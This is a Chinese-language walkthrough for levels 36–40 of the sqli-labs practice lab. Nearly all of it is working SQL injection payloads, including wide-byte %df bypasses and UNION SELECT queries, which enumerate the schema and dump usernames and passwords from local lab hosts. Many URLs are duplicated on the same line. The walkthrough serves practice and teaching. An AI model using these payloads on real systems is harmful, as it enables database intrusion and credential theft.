本文主要是介绍sql-labs36-40通关攻略,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!
第36关
一.判断闭合点
http://127.0.0.1/Less-36/?id=1%df%20--+
http://127.0.0.1/Less-36/?id=1%df%20--+
二.查询数据库
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,database(),3--+
三.查表
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%20%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=database()--+
四.查列
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=0x656D61696C73--+
五.查user表里所有数据
http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+http://127.0.0.1/Less-36/?id=-1%df%27%20union%20select%201,group_concat(id,username,0x3a,password),3%20from%20users--+
第37关
一.进入brup抓包
进入重放器
二.查询数据库
uname=-1%df' union select database(),2#&passwd=1&submit=Submit
三.查表
uname=-1%df' union select 1,group_concat(table_name) from information_schema.tables where table_schema=database()#&passwd=1&submit=Submit
四.查列
uname=-1%df' union select 1,group_concat(column_name) from information_schema.columns where table_name=0x656D61696C73#&passwd=1&submit=Submit
五.查user表里所有数据
uname=-1%df' union select 1,group_concat(id,0x3a,email_id) from emails#&passwd=1&submit=Submit
第38关
一.判断闭合点
http://172.16.1.41/Less-38/?id=1%27--+http://172.16.1.41/Less-38/?id=1%27--+
二.查询数据库
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,database()--+
三.查表
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)--+
四查列
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五查user表里所有数据
http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+http://172.16.1.41/Less-38/?id=-1%27%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)%20--+
第 39关
一.判断闭合点
http://172.16.1.41/Less-39/?id=1--+http://172.16.1.41/Less-39/?id=1--+
二.查询数据库
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,database()--
三.查表
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=%27security%27)%20--+
四.查列
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五.查user表中所有数据
http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-39/?id=-1%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
第40关
一.判断闭合点
http://172.16.1.41/Less-40/?id=1%27)--+http://172.16.1.41/Less-40/?id=1%27)--+
二.查询数据库
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,database(),3--+
三.查表
http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+http://172.16.1.41/Less-40/?id=1%27)%20union%20select%201,database(),(select%20group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database())--+
四.查列
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(column_name)%20from%20information_schema.columns%20where%20table_schema=%27security%27%20and%20table_name=%27users%27)%20--+
五.查user表里所有数据
http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+http://172.16.1.41/Less-40/?id=-1%27)%20union%20select%201,2,(select%20group_concat(username,%27~%27,password)%20from%20security.users)--+
这篇关于sql-labs36-40通关攻略的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!
